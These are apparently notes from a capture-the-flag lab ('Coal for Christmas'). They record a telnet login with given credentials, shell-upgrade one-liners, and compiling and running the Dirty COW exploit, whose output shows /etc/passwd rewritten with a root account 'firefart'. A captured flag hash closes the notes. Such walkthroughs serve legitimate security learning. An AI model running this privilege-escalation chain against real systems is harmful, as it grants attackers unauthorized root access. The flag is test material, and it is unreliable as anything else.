Coal for Christmas - Special by John Hammond

attack ip: 10.9.215.98
target ip: 10.10.144.159
target ip2: 10.10.187.166

telnet
	Username: santa
	Password: clauschristmas

python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'

gcc -pthread dirty.c -o dirty -lcrypt


santa@christmas:~$ ./dirty 12345
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 12345
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

md5 flag: 8b16f00dd3b51efadb02c1df7f8427cc
